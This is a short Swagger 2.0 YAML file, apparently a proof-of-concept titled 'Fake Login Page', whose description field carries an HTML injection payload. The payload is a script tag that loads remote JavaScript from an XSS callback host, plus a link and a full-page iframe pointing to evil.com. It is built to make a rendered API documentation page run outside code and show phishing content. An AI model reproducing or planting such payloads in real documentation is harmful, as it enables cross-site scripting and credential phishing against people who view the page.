swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection BY PushkraJ</h1>
        <script src=https://xss.report/c/faultydictator></script>
        <a href="http://evil.com">Link Text</a>
        <iframe src="http://evil.com" width="100%" height="800px" style="border:none;"></iframe>
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
